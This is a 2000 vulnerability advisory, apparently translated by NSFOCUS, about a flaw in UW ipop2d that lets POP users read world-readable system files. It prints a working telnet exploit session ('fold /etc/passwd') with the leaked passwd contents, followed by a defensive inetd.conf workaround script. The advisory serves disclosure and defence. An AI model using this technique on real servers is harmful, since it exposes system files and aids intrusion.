pop2d Remote File Read Vulnerability

Published: 2000-07-20
Updated: 2000-07-20

Affected systems:

University of Washington pop2d 4.55
   + University of Washington imap 4.7(a/b/c)
University of Washington pop2d 4.54
   + University of Washington imap 4.6
University of Washington pop2d 4.51
   + University of Washington imap 4.5
      + RedHat Linux 6.2
University of Washington pop2d 4.46
   + University of Washington imap 4.4
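Description:

ipop2d is part of the University of Washington imap package. ipop v4.55 and
earlier versions contain a security vulnerability that allows any user with a
POP account to view system files (the file must be world-readable or
group-readable). Under normal circumstances this is not a security problem, but
on systems that are meant to provide POP access only, it leaks some system
information and potentially increases the risk of attack.

<* Source: <mandark@mandark.jumpline.com> *>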




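Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!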


[mandark@mandark mandark]$ telnet localhost 109
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
+ POP2 localhost.localdomain v4.46 server ready
helo mandark blehpasshere
#1 messages in /var/spool/mail/mandark
read 1
=389 characters in message 1
retr
Return-Path: <root@mandark.jumpline.com>
Received: (from root@localhost)
by mandark.jumpline.com (8.10.1/8.10.1) id e6EGS7C27037
for mandark@localhost; Fri, 14 Jul 2000 12:28:07 -0400
Date: Fri, 14 Jul 2000 12:28:07 -0400
From: root <root@mandark.jumpline.com>
Message-Id: <200007141628.e6EGS7C27037@mandark.jumpline.com>
To: mandark@mandark.jumpline.com
Status: RO

message is here...

acks
=0 No more messages
fold /etc/passwd
#1 messages in /etc/passwd
read 1
=1178 characters in message 1
retr
Date: Thu, 13 Jul 2000 16:50:07 -0400
From: root@mandark.jumpline.com
Subject: /etc/passwd
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
postfix:x:101:104:postfix:/var/spool/postfix:
gdm:x:0:0::/home/gdm:/bin/bash
mandark:x:500:503::/home/mandark:/bin/bash
godie:x:0:0::/home/godie:/bin/bash
mp3:x:501:506::/mp3:/bin/bash
chefo:x:502:507::/home/chefo:/bin/bash
crunch:x:503:508::/home/crunch:/bin/bash
gsx:x:505:510::/home/gsx:/bin/csh
matt:x:506:511::/home/matt:/bin/bash
lyw0d:x:507:512::/home/lyw0d:/bin/bash

Recommendation:

None at this time.
Temporary workaround:
Comment out the ipop2d line in /etc/inetd.conf:
#pop-2   stream  tcp     nowait  root    /usr/sbin/tcpd ipop2d
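
The workaround above as a script, added here as an example (not part of the original advisory): it lists the active inetd.conf entries that start ipop2d and comments them out, keeping a backup. The sample file and the pop2alt service name are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the advisory. It works on a copy of inetd.conf;
# the sample entries below are constructed ("pop2alt" is a hypothetical name).

write_sample() {
    cat > "$1" <<'EOF'
# constructed sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd in.ftpd -l -a
pop-2   stream  tcp     nowait  root    /usr/sbin/tcpd ipop2d
pop-3   stream  tcp     nowait  root    /usr/sbin/tcpd ipop3d
#imap   stream  tcp     nowait  root    /usr/sbin/tcpd imapd
pop2alt stream  tcp     nowait  root    /usr/sbin/ipop2d ipop2d
EOF
}

# Print active (uncommented) entries whose server program or argv[0] is ipop2d.
# Fields 6 and up hold the server path and its arguments.
active_ipop2d() {
    awk '!/^[ \t]*#/ {
        for (i = 6; i <= NF; i++)
            if ($i == "ipop2d" || $i ~ /\/ipop2d$/) { print; next }
    }' "$1"
}

# Comment those entries out in place; the original is kept as <file>.bak.
disable_ipop2d() {
    cp -p "$1" "$1.bak" || return 1
    awk '{
        hit = 0
        if ($0 !~ /^[ \t]*#/)
            for (i = 6; i <= NF; i++)
                if ($i == "ipop2d" || $i ~ /\/ipop2d$/) hit = 1
        if (hit) $0 = "#" $0
        print
    }' "$1.bak" > "$1"
}

# Demo on the constructed sample.
conf=$(mktemp)
write_sample "$conf"
echo "active before:"; active_ipop2d "$conf"
disable_ipop2d "$conf"
echo "active after: $(active_ipop2d "$conf" | wc -l)"
rm -f "$conf" "$conf.bak"
```

On a real host the edit only takes effect once inetd re-reads its configuration, typically after it is sent SIGHUP.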


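This vulnerability advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.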